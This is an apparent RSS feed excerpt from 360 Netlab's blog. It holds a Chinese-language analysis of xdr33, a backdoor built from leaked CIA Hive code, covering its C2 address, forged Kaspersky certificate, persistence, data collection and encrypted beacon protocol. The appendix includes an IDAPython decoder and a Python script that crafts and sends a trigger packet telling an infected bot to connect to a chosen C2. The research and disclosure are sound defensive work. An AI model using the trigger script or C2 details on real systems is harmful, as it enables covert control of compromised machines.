u4C8BCPfxmuyNFdw9TVqTjdwWqWM84VMg3Cq3ZrEa94DMOAXm3QXcDsar7SQn5Xw
LCsU7xKJc6gwk4eNWEGxFJwS0EwPhBkt1lH4OD11jH0Ukr5rRJvh1blUiOHPd3//
kzeXNozA9PwoH4wewqk8bXZhj5ZA9LR7rm+5OrCoWXofgn1Gi2yd+LWWCrE7NBWm
yRelxOSPRSQ1fvAVvuRrCnCJgKxG/2Ba2DLs95u6IxYX
-----END CERTIFICATE-----

</code></pre>
<h1 id="%E9%99%84%E5%BD%95">&#x9644;&#x5F55;</h1>
<h2 id="0x1-decoderes">0x1 Decode_RES</h2>
<pre><code>import idautils
import ida_bytes

def decode(addr,len):
    tmp=bytearray()
    
    buf=ida_bytes.get_bytes(addr,len)
    for i in buf:
        tmp.append(~i&amp;0xff)

    print(&quot;%x, %s&quot; %(addr,bytes(tmp)))
    ida_bytes.put_bytes(addr,bytes(tmp))
    idc.create_strlit(addr,addr+len)
    
calllist=idautils.CodeRefsTo(0x0804F1D8,1)
for addr in calllist:
    prev1Head=idc.prev_head(addr)
    if &apos;push    offset&apos; in idc.generate_disasm_line(prev1Head,1) and idc.get_operand_type(prev1Head,0)==5:
        bufaddr=idc.get_operand_value(prev1Head,0)
        prev2Head=idc.prev_head(prev1Head)
        
        if &apos;push&apos; in idc.generate_disasm_line(prev2Head,1) and idc.get_operand_type(prev2Head,0)==5:
            leng=idc.get_operand_value(prev2Head,0)
            decode(bufaddr,leng)

</code></pre>
<h2 id="0x02-gentrigger">0x02 GenTrigger</h2>
<pre><code>import random
import socket


def crc16(data: bytearray, offset, length):
  if data is None or offset &lt; 0 or offset &gt; len(data) - 1 and offset + length &gt; len(data):
    return 0
  crc = 0xFFFF
  for i in range(0, length):
    crc ^= data[offset + i] &lt;&lt; 8
    for j in range(0, 8):
      if (crc &amp; 0x8000) &gt; 0:
        crc = (crc &lt;&lt; 1) ^ 0x1021
      else:
        crc = crc &lt;&lt; 1
  return crc &amp; 0xFFFF

def Gen_payload(ip:str,port:int):
    out=bytearray()
    part1=random.randbytes(92)
    sum=crc16(part1,8,84)
  
    offset1=sum % 0xc8
    offset2=sum % 0x37
    padding1=random.randbytes(offset1)
    padding2=random.randbytes(8)
    
    
    host=socket.inet_aton(ip)
    C2=bytearray(b&apos;\x01&apos;)
    C2+=host
    C2+=int.to_bytes(port,2,byteorder=&quot;big&quot;)
    key=b&apos;NetlabPatched,Enjoy!&apos;
    C2 = C2+key +b&apos;\x00\x00&apos;
    c2sum=crc16(C2,0,29)
    C2=C2[:-2]
    C2+=(int.to_bytes(c2sum,2,byteorder=&quot;big&quot;))

    flag=0x7f*10
    out+=part1
    out+=padding1
    out+=(int.to_bytes(sum,2,byteorder=&quot;big&quot;))
    out+=(int.to_bytes(flag,2,byteorder=&quot;big&quot;))
    out+=padding2

    tmp=bytearray()
    for i in range(29):
      tmp.append(C2[i] ^ out[offset2+8+i])
    out+=tmp

    leng=472-len(out)
    lengpadding=random.randbytes(random.randint(0,leng+1))
    out+=lengpadding

    return out
    
payload=Gen_payload(&apos;192.168.159.128&apos;,6666)
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.sendto(payload,(&quot;192.168.159.133&quot;,2345))  # &#x4EFB;&#x610F;&#x7AEF;&#x53E3;

</code></pre>
]]></content:encoded></item><item><title><![CDATA[警惕：魔改后的CIA攻击套件Hive进入黑灰产领域]]></title><description><![CDATA[<!--kg-card-begin: markdown--><h1 id>&#x6982;&#x8FF0;</h1>
<p>2022&#x5E74;10&#x6708;21&#x65E5;&#xFF0C;360Netlab&#x7684;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x6355;&#x83B7;&#x4E86;&#x4E00;&#x4E2A;&#x901A;&#x8FC7;F5&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;&#xFF0C;VT 0&#x68C0;&#x6D4B;&#x7684;&#x53EF;&#x7591;ELF&#x6587;&#x4EF6;<code>ee07a74d12c0bb3594965b51d0e45b6f</code>&#xFF0C;&#x6D41;&#x91CF;&#x76D1;&#x63A7;&#x7CFB;&#x7EDF;&#x63D0;&#x793A;&#x5B83;&#x548C;</p>]]></description><link>https://blog.netlab.360.com/warning-hive-variant-xdr33-is-coming_cn/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53028</guid><category><![CDATA[Botnet]]></category><category><![CDATA[xdr33]]></category><category><![CDATA[port knocking]]></category><category><![CDATA[Backdoor]]></category><category><![CDATA[CIA HIVE]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Mon, 09 Jan 2023 03:13:20 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><h1 id>&#x6982;&#x8FF0;</h1>
<p>2022&#x5E74;10&#x6708;21&#x65E5;&#xFF0C;360Netlab&#x7684;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x6355;&#x83B7;&#x4E86;&#x4E00;&#x4E2A;&#x901A;&#x8FC7;F5&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;&#xFF0C;VT 0&#x68C0;&#x6D4B;&#x7684;&#x53EF;&#x7591;ELF&#x6587;&#x4EF6;<code>ee07a74d12c0bb3594965b51d0e45b6f</code>&#xFF0C;&#x6D41;&#x91CF;&#x76D1;&#x63A7;&#x7CFB;&#x7EDF;&#x63D0;&#x793A;&#x5B83;&#x548C;IP<code>45.9.150.144</code>&#x4EA7;&#x751F;&#x4E86;SSL&#x6D41;&#x91CF;&#xFF0C;&#x800C;&#x4E14;&#x53CC;&#x65B9;&#x90FD;&#x4F7F;&#x7528;&#x4E86;<strong>&#x4F2A;&#x9020;&#x7684;Kaspersky&#x8BC1;&#x4E66;</strong>&#xFF0C;&#x8FD9;&#x5F15;&#x8D77;&#x4E86;&#x6211;&#x4EEC;&#x7684;&#x5173;&#x6CE8;&#x3002;&#x7ECF;&#x8FC7;&#x5206;&#x6790;&#xFF0C;&#x6211;&#x4EEC;&#x786E;&#x8BA4;&#x5B83;&#x7531;CIA&#x88AB;&#x6CC4;&#x9732;&#x7684;Hive&#x9879;&#x76EE;server&#x6E90;&#x7801;&#x6539;&#x7F16;&#x800C;&#x6765;&#x3002;<strong>&#x8FD9;&#x662F;&#x6211;&#x4EEC;&#x9996;&#x6B21;&#x6355;&#x83B7;&#x5230;&#x5728;&#x91CE;&#x7684;CIA HIVE&#x653B;&#x51FB;&#x5957;&#x4EF6;&#x53D8;&#x79CD;</strong>&#xFF0C;&#x57FA;&#x4E8E;&#x5176;&#x5185;&#x5D4C;Bot&#x7AEF;&#x8BC1;&#x4E66;&#x7684;<strong>CN=xdr33</strong>&#xFF0C; &#x6211;&#x4EEC;&#x5185;&#x90E8;&#x5C06;&#x5176;&#x547D;&#x540D;&#x4E3A;<strong>xdr33</strong>&#x3002;&#x5173;&#x4E8E;CIA&#x7684;Hive&#x9879;&#x76EE;&#xFF0C;&#x4E92;&#x8054;&#x7F51;&#x4E2D;&#x6709;&#x5927;&#x91CF;&#x7684;&#x6E90;&#x7801;&#x5206;&#x6790;&#x7684;&#x6587;&#x7AE0;&#xFF0C;&#x8BFB;&#x8005;&#x53EF;&#x81EA;&#x884C;&#x53C2;&#x9605;&#xFF0C;&#x6B64;&#x5904;&#x4E0D;&#x518D;&#x5C55;&#x5F00;&#x3002;</p>
<p>&#x6982;&#x62EC;&#x6765;&#x8BF4;&#xFF0C;xdr33&#x662F;&#x4E00;&#x4E2A;&#x8131;&#x80CE;&#x4E8E;CIA Hive&#x9879;&#x76EE;&#x7684;&#x540E;&#x95E8;&#x6728;&#x9A6C;&#xFF0C;&#x4E3B;&#x8981;&#x76EE;&#x7684;&#x662F;&#x6536;&#x96C6;&#x654F;&#x611F;&#x4FE1;&#x606F;&#xFF0C;&#x4E3A;&#x540E;&#x7EED;&#x7684;&#x5165;&#x4FB5;&#x63D0;&#x4F9B;&#x7ACB;&#x8DB3;&#x70B9;&#x3002;&#x4ECE;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x6765;&#x770B;&#xFF0C;xdr33&#x4F7F;&#x7528;XTEA&#x6216;AES&#x7B97;&#x6CD5;&#x5BF9;&#x539F;&#x59CB;&#x6D41;&#x91CF;&#x8FDB;&#x884C;&#x52A0;&#x5BC6;&#xFF0C;&#x5E76;&#x91C7;&#x7528;&#x5F00;&#x542F;&#x4E86;<strong>Client-Certificate Authentication</strong>&#x6A21;&#x5F0F;&#x7684;SSL&#x5BF9;&#x6D41;&#x91CF;&#x505A;&#x8FDB;&#x4E00;&#x6B65;&#x7684;&#x4FDD;&#x62A4;&#xFF1B;&#x4ECE;&#x529F;&#x80FD;&#x6765;&#x8BF4;&#xFF0C;&#x4E3B;&#x8981;&#x6709;<code>beacon&#xFF0C;trigger</code>&#x4E24;&#x5927;&#x4EFB;&#x52A1;&#xFF0C;&#x5176;&#x4E2D;<strong>beacon</strong>&#x662F;&#x5468;&#x671F;&#x6027;&#x5411;&#x786C;&#x7F16;&#x7801;&#x7684;Beacon C2&#x4E0A;&#x62A5;&#x8BBE;&#x5907;&#x654F;&#x611F;&#x4FE1;&#x606F;&#xFF0C;&#x6267;&#x884C;&#x5176;&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#xFF0C;&#x800C;<strong>trigger</strong>&#x5219;&#x662F;&#x76D1;&#x63A7;&#x7F51;&#x5361;&#x6D41;&#x91CF;&#x4EE5;&#x8BC6;&#x522B;&#x6697;&#x85CF;Trigger C2&#x7684;&#x7279;&#x5B9A;&#x62A5;&#x6587;&#xFF0C;&#x5F53;&#x6536;&#x5230;&#x6B64;&#x7C7B;&#x62A5;&#x6587;&#x65F6;&#xFF0C;&#x5C31;&#x548C;&#x5176;&#x4E2D;&#x7684;Trigger C2&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#xFF0C;&#x5E76;&#x7B49;&#x5F85;&#x6267;&#x884C;&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#x3002;</p>
<p>&#x529F;&#x80FD;&#x793A;&#x610F;&#x56FE;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_function.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_function.png" class="kg-image"></a></p>
<p>Hive&#x4F7F;&#x7528;<strong>BEACON_HEADER_VERSION</strong>&#x5B8F;&#x5B9A;&#x4E49;&#x6307;&#x5B9A;&#x7248;&#x672C;&#xFF0C;&#x5728;&#x6E90;&#x7801;&#x7684;Master&#x5206;&#x652F;&#x4E0A;&#xFF0C;&#x5B83;&#x7684;&#x503C;<code>29</code>&#xFF0C;&#x800C;xdr33&#x4E2D;&#x503C;&#x4E3A;<code>34</code>&#xFF0C;&#x6216;&#x8BB8;xdr33&#x5728;&#x89C6;&#x91CE;&#x4E4B;&#x5916;&#x5DF2;&#x7ECF;&#x6709;&#x8FC7;&#x4E86;&#x6570;&#x8F6E;&#x7684;&#x8FED;&#x4EE3;&#x66F4;&#x65B0;&#x3002;&#x548C;&#x6E90;&#x7801;&#x8FDB;&#x884C;&#x5BF9;&#x6BD4;&#xFF0C;xdr33&#x7684;&#x66F4;&#x65B0;&#x4F53;&#x73B0;&#x5728;&#x4EE5;&#x4E0B;5&#x4E2A;&#x65B9;&#x9762;:</p>
<ul>
<li>&#x6DFB;&#x52A0;&#x4E86;&#x65B0;&#x7684;CC&#x6307;&#x4EE4;</li>
<li>&#x5BF9;&#x51FD;&#x6570;&#x8FDB;&#x884C;&#x4E86;&#x5C01;&#x88C5;&#x6216;&#x5C55;&#x5F00;</li>
<li>&#x5BF9;&#x7ED3;&#x6784;&#x4F53;&#x8FDB;&#x884C;&#x4E86;&#x8C03;&#x5E8F;&#xFF0C;&#x6269;&#x5C55;</li>
<li>Trigger&#x62A5;&#x6587;&#x683C;&#x5F0F;</li>
<li>Beacon&#x4EFB;&#x52A1;&#x4E2D;&#x52A0;&#x5165;CC&#x64CD;&#x4F5C;</li>
</ul>
<p>xdr33&#x7684;&#x8FD9;&#x4E9B;&#x4FEE;&#x6539;&#x5728;&#x5B9E;&#x73B0;&#x4E0A;&#x6765;&#x770B;&#x4E0D;&#x7B97;&#x975E;&#x5E38;&#x7CBE;&#x826F;&#xFF0C;&#x518D;&#x52A0;&#x4E0A;&#x6B64;&#x6B21;&#x4F20;&#x64AD;&#x6240;&#x6240;&#x7528;&#x7684;&#x6F0F;&#x6D1E;&#x4E3A;N-day&#xFF0C;&#x56E0;&#x6B64;&#x6211;&#x4EEC;&#x503E;&#x5411;&#x4E8E;&#x6392;&#x9664;CIA&#x5728;&#x6CC4;&#x6F0F;&#x6E90;&#x7801;&#x4E0A;&#x7EE7;&#x7EED;&#x6539;&#x8FDB;&#x7684;&#x53EF;&#x80FD;&#x6027;&#xFF0C;&#x8BA4;&#x4E3A;&#x5B83;&#x662F;&#x9ED1;&#x4EA7;&#x56E2;&#x4F19;&#x5229;&#x7528;&#x5DF2;&#x7ECF;&#x6CC4;&#x6F0F;&#x6E90;&#x7801;&#x9B54;&#x6539;&#x7684;&#x7ED3;&#x679C;&#x3002;&#x8003;&#x8651;&#x5230;&#x539F;&#x59CB;&#x653B;&#x51FB;&#x5957;&#x4EF6;&#x7684;&#x5DE8;&#x5927;&#x5A01;&#x529B;&#xFF0C;&#x8FD9;&#x7EDD;&#x975E;&#x5B89;&#x5168;&#x793E;&#x533A;&#x4E50;&#x89C1;&#xFF0C;&#x6211;&#x4EEC;&#x51B3;&#x5B9A;&#x7F16;&#x5199;&#x672C;&#x6587;&#x5411;&#x793E;&#x533A;&#x5206;&#x4EAB;&#x6211;&#x4EEC;&#x7684;&#x53D1;&#x73B0;&#xFF0C;&#x5171;&#x540C;&#x7EF4;&#x62A4;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#x7684;&#x5B89;&#x5168;&#x3002;</p>
<h1 id="payload">&#x6F0F;&#x6D1E;&#x6295;&#x9012;Payload</h1>
<p>&#x6211;&#x4EEC;&#x6355;&#x83B7;&#x7684;Payload&#x7684;md5&#x4E3A;<code>ad40060753bc3a1d6f380a5054c1403a</code>&#xFF0C;&#x5B83;&#x7684;&#x5185;&#x5BB9;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_logd.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_logd.png" class="kg-image"></a></p>
<p>&#x4EE3;&#x7801;&#x7B80;&#x5355;&#x660E;&#x4E86;&#xFF0C;&#x5B83;&#x7684;&#x4E3B;&#x8981;&#x76EE;&#x7684;&#x662F;&#xFF1A;</p>
<p>1&#xFF1A;&#x4E0B;&#x8F7D;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x7684;&#x6837;&#x672C;&#x5E76;&#x5C06;&#x5176;&#x4F2A;&#x88C5;&#x6210;<code>/command/bin/hlogd</code>&#x3002;</p>
<p>2&#xFF1A;&#x5B89;&#x88C5;<code>logd</code>&#x670D;&#x52A1;&#x4EE5;&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;&#x3002;</p>
<h1 id>&#x6837;&#x672C;&#x5206;&#x6790;</h1>
<p>&#x6211;&#x4EEC;&#x53EA;&#x6355;&#x83B7;&#x4E86;&#x4E00;&#x4E2A;X86 &#x67B6;&#x6784;&#x7684;xdr33&#x6837;&#x672C;&#xFF0C;&#x5B83;&#x7684;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code>MD5:ee07a74d12c0bb3594965b51d0e45b6f
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Packer: None
</code></pre>
<p>&#x7B80;&#x5355;&#x6765;&#x8BF4;&#xFF0C;<strong>xdr33</strong>&#x5728;&#x88AB;&#x4FB5;&#x5165;&#x7684;&#x8BBE;&#x5907;&#x8FD0;&#x884C;&#x65F6;&#xFF0C;&#x9996;&#x5148;&#x89E3;&#x5BC6;&#x6240;&#x6709;&#x7684;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x7136;&#x540E;&#x68C0;&#x67E5;&#x662F;&#x5426;&#x6709;root/admin&#x6743;&#x9650;&#xFF0C;&#x5982;&#x679C;&#x6CA1;&#x6709;&#xFF0C;&#x5219;&#x8F93;&#x51FA;<code>Insufficient permissions. Try again...</code>&#x5E76;&#x9000;&#x51FA;&#xFF1B;&#x53CD;&#x4E4B;&#x5C31;&#x521D;&#x59CB;&#x5316;&#x5404;&#x79CD;&#x8FD0;&#x884C;&#x65F6;&#x53C2;&#x6570;&#xFF0C;&#x5982;C2&#xFF0C;PORT&#xFF0C;&#x8FD0;&#x884C;&#x95F4;&#x9694;&#x65F6;&#x95F4;&#x7B49;&#x3002;&#x6700;&#x540E;&#x901A;&#x8FC7;<strong>beacon_start</strong>&#xFF0C;<strong>TriggerListen</strong>&#x4E24;&#x4E2A;&#x51FD;&#x6570;&#x5F00;&#x542F;Beacon&#xFF0C;Trigger&#x4E24;&#x5927;&#x4EFB;&#x52A1;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_main.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_main.png" class="kg-image"></a></p>
<p>&#x4E0B;&#x6587;&#x4E3B;&#x8981;&#x4ECE;2&#x8FDB;&#x5236;&#x9006;&#x5411;&#x7684;&#x89D2;&#x5EA6;&#x51FA;&#x53D1;&#xFF0C;&#x5206;&#x6790;Beacon&#xFF0C;Trigger&#x529F;&#x80FD;&#x7684;&#x5B9E;&#x73B0;&#xFF1B;&#x540C;&#x65F6;&#x7ED3;&#x5408;&#x6E90;&#x7801;&#x8FDB;&#x884C;&#x6BD4;&#x5BF9;&#x5206;&#x6790;&#xFF0C;&#x770B;&#x770B;&#x53D1;&#x751F;&#x4E86;&#x54EA;&#x4E9B;&#x53D8;&#x5316;&#x3002;</p>
<h3 id>&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x4FE1;&#x606F;</h3>
<p>xdr33&#x901A;&#x8FC7;&#x4EE5;&#x4E0B;&#x4EE3;&#x7801;&#x7247;&#x6BB5;<strong>decode_str</strong>&#x89E3;&#x5BC6;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x5B83;&#x7684;&#x903B;&#x8F91;&#x975E;&#x5E38;&#x7B80;&#x5355;&#x5373;<strong>&#x9010;&#x5B57;&#x8282;&#x53D6;&#x53CD;</strong>&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_decode.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_decode.png" class="kg-image"></a></p>
<p>&#x5728;IDA&#x4E2D;&#x53EF;&#x4EE5;&#x770B;&#x5230;decode_str&#x7684;&#x4EA4;&#x53C9;&#x5F15;&#x7528;&#x975E;&#x5E38;&#x591A;&#xFF0C;&#x4E00;&#x5171;&#x4E86;152&#x5904;&#x3002;&#x4E3A;&#x4E86;&#x8F85;&#x52A9;&#x5206;&#x6790;&#xFF0C;&#x6211;&#x4EEC;&#x5B9E;&#x73B0;&#x4E86;&#x9644;&#x5F55;&#x4E2D;IDAPython&#x811A;&#x672C; Decode_RES&#xFF0C;&#x5BF9;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x89E3;&#x5BC6;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_idaxref.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_idaxref.png" class="kg-image"></a></p>
<p>&#x89E3;&#x5BC6;&#x7ED3;&#x679C;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x5176;&#x4E2D;&#x6709;<code>Beacon C2</code> <strong>45.9.150.144</strong>&#xFF0C;&#x8FD0;&#x884C;&#x65F6;&#x63D0;&#x793A;&#x4FE1;&#x606F;&#xFF0C;&#x67E5;&#x770B;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x7684;&#x547D;&#x4EE4;&#x7B49;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_config.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_config.png" class="kg-image"></a></p>
<h1 id="beacontask">Beacon Task</h1>
<p>Beacon&#x7684;&#x4E3B;&#x8981;&#x529F;&#x80FD;&#x662F;&#x5468;&#x671F;&#x6027;&#x7684;&#x6536;&#x96C6;PID&#xFF0C;MAC&#xFF0C;SystemUpTime&#xFF0C;&#x8FDB;&#x7A0B;&#x4EE5;&#x53CA;&#x7F51;&#x7EDC;&#x76F8;&#x5173;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#xFF1B;&#x7136;&#x540E;&#x4F7F;&#x7528;bzip&#xFF0C;XTEA&#x7B97;&#x6CD5;&#x5BF9;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x538B;&#x7F29;&#xFF0C;&#x52A0;&#x5BC6;&#xFF0C;&#x5E76;&#x4E0A;&#x62A5;&#x7ED9;C2&#xFF1B;&#x6700;&#x540E;&#x7B49;&#x5F85;&#x6267;&#x884C;C2&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4; &#x3002;</p>
<h2 id="0x01">0x01: &#x4FE1;&#x606F;&#x6536;&#x96C6;</h2>
<ul>
<li>
<p>MAC</p>
<p>&#x901A;&#x8FC7;<code>SIOCGIFCON</code> &#x6216; <code>SIOCGIFHWADDR</code>&#x67E5;&#x8BE2;MAC</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_mac-1.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_mac-1.png" class="kg-image"></a></p>
</li>
<li>
<p>SystemUpTime</p>
<p>&#x901A;&#x8FC7;/proc/uptime&#x6536;&#x96C6;&#x7CFB;&#x7EDF;&#x7684;&#x8FD0;&#x884C;&#x65F6;&#x95F4;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_uptime.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_uptime.png" class="kg-image"></a></p>
</li>
<li>
<p>&#x8FDB;&#x7A0B;&#x4EE5;&#x53CA;&#x7F51;&#x7EDC;&#x76F8;&#x5173;&#x7684;&#x4FE1;&#x606F;</p>
<p>&#x901A;&#x8FC7;&#x6267;&#x884C;&#x4EE5;&#x4E0B;4&#x4E2A;&#x547D;&#x4EE4;&#x6536;&#x96C6;<strong>&#x8FDB;&#x7A0B;&#xFF0C;&#x7F51;&#x5361;&#xFF0C;&#x7F51;&#x7EDC;&#x8FDE;&#x63A5;&#xFF0C;&#x8DEF;&#x7531;</strong>&#x7B49;&#x4FE1;&#x606F;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_netinfo.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_netinfo.png" class="kg-image"></a></p>
</li>
</ul>
<h2 id="0x02">0x02: &#x4FE1;&#x606F;&#x5904;&#x7406;</h2>
<p>Xdr33&#x901A;&#x8FC7;update_msg&#x51FD;&#x6570;&#x5C06;&#x4E0D;&#x540C;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x7EC4;&#x5408;&#x5728;&#x4E00;&#x8D77;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_compose.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_compose.png" class="kg-image"></a></p>
<p>&#x4E3A;&#x4E86;&#x533A;&#x522B;&#x4E0D;&#x540C;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#xFF0C;Hive&#x8BBE;&#x8BA1;&#x4E86;ADD_HDR&#xFF0C;&#x5B83;&#x7684;&#x5B9A;&#x4E49;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x4E0A;&#x56FE;&#x4E2D;&#x7684;&#x201C;3&#xFF0C;4&#xFF0C;5&#xFF0C;6&#x201D;&#x5C31;&#x4EE3;&#x8868;&#x4E86;&#x4E0D;&#x540C;&#x7684;Header Type&#x3002;</p>
<pre><code>typedef struct __attribute__ ((packed)) add_header {
	unsigned short type;
	unsigned short length;
} ADD_HDR;

</code></pre>
<p>&#x90A3;&#x201C;3&#xFF0C;4&#xFF0C;5&#xFF0C;6&#x201D;&#x5177;&#x4F53;&#x4EE3;&#x8868;&#x4EC0;&#x4E48;&#x7C7B;&#x578B;&#x5462;&#xFF1F;&#x8FD9;&#x5C31;&#x8981;&#x770B;&#x4E0B;&#x56FE;&#x6E90;&#x7801;&#x4E2D;Header Types&#x7684;&#x5B9A;&#x4E49;&#x4E86;&#x3002;xdr33&#x5728;&#x6B64;&#x57FA;&#x7840;&#x4E0A;&#x8FDB;&#x884C;&#x4E86;&#x6269;&#x5C55;&#xFF0C;&#x65B0;&#x589E;&#x4E86;0&#xFF0C;9&#x4FE9;&#x4E2A;&#x503C;&#xFF0C;&#x5206;&#x522B;&#x4EE3;&#x8868;<strong>Sha1[:32] of MAC</strong>&#xFF0C;&#x4EE5;&#x53CA;<strong>PID of xdr33</strong>&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_type.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_type.png" class="kg-image"></a></p>
<p>xdr32&#x5728;&#x865A;&#x62DF;&#x673A;&#x4E2D;&#x7684;&#x6536;&#x96C6;&#x5230;&#x7684;&#x90E8;&#x5206;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x5B83;&#x5305;&#x542B;&#x4E86;head type&#x4E3A;0,1,2,7,9,3&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_deviceinfo.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_deviceinfo.png" class="kg-image"></a></p>
<p>&#x503C;&#x5F97;&#x4E00;&#x63D0;&#x7684;&#x662F;type=0&#xFF0C;Sha1[:32] of MAC&#xFF0C;&#x5B83;&#x7684;&#x610F;&#x601D;&#x662F;&#x53D6;MAC SHA1&#x7684;&#x524D;32&#x5B57;&#x8282;&#x3002;&#x4EE5;&#x4E0A;&#x56FE;&#x4E2D;&#x7684;&#x7684;mac&#x4E3A;&#x4F8B;&#xFF0C;&#x5B83;&#x7684;&#x8BA1;&#x7B97;&#x8FC7;&#x7A0B;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>mac:00-0c-29-94-d9-43,remove &quot;-&quot;
result:00 0c 29 94 d9 43

sha1 of mac:
result:c55c77695b6fd5c24b0cf7ccce3e464034b20805

sha1[:32] of mac:
result:c55c77695b6fd5c24b0cf7ccce3e4640
</code></pre>
<p>&#x5F53;&#x6240;&#x6709;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x7EC4;&#x5408;&#x5B8C;&#x6BD5;&#x540E;&#xFF0C;&#x4F7F;&#x7528;bzip&#x8FDB;&#x884C;&#x538B;&#x7F29;&#xFF0C;&#x5E76;&#x5728;&#x5934;&#x90E8;&#x589E;&#x52A0;2&#x5B57;&#x8282;&#x7684;beacon_header_version&#xFF0C;&#x4EE5;&#x53CA;2&#x5B57;&#x8282;&#x7684;OS&#x4FE1;&#x606F;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_devicebzip.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_devicebzip.png" class="kg-image"></a></p>
<h2 id="0x03">0x03: &#x7F51;&#x7EDC;&#x901A;&#x4FE1;</h2>
<p>xdr33&#x4E0E;Beacon C2&#x901A;&#x4FE1;&#x8FC7;&#x7A0B;&#xFF0C;&#x5305;&#x542B;&#x4EE5;&#x4E0B;4&#x4E2A;&#x6B65;&#x9AA4;&#xFF0C;&#x4E0B;&#x6587;&#x5C06;&#x8BE6;&#x7EC6;&#x5206;&#x6790;&#x5404;&#x4E2A;&#x6B65;&#x9AA4;&#x7684;&#x7EC6;&#x8282;&#x3002;</p>
<ul>
<li>&#x53CC;&#x5411;SSL&#x8BA4;&#x8BC1;</li>
<li>&#x83B7;&#x53D6;XTEA&#x5BC6;&#x94A5;</li>
<li>&#x5411;C2&#x4E0A;&#x62A5;XTEA&#x52A0;&#x5BC6;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;</li>
<li>&#x6267;&#x884C;C2&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;</li>
</ul>
<h3 id="step1ssl">Step1: &#x53CC;&#x5411;SSL&#x8BA4;&#x8BC1;</h3>
<p>&#x6240;&#x8C13;&#x53CC;&#x5411;SSL&#x8BA4;&#x8BC1;&#xFF0C;&#x5373;&#x8981;&#x6C42;Bot&#xFF0C;C2&#x8981;&#x786E;&#x8BA4;&#x5F7C;&#x6B64;&#x7684;&#x8EAB;&#x4EFD;&#xFF0C;&#x4ECE;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x5C42;&#x9762;&#x6765;&#x770B;&#xFF0C;&#x53EF;&#x4EE5;&#x5F88;&#x660E;&#x663E;&#x770B;&#x5230;Bot&#xFF0C;C2&#x76F8;&#x4E92;&#x8BF7;&#x6C42;&#x5F7C;&#x6B64;&#x8BC1;&#x4E66;&#x5E76;&#x6821;&#x9A8C;&#x7684;&#x8FC7;&#x7A0B;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_certi.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_certi.png" class="kg-image"></a></p>
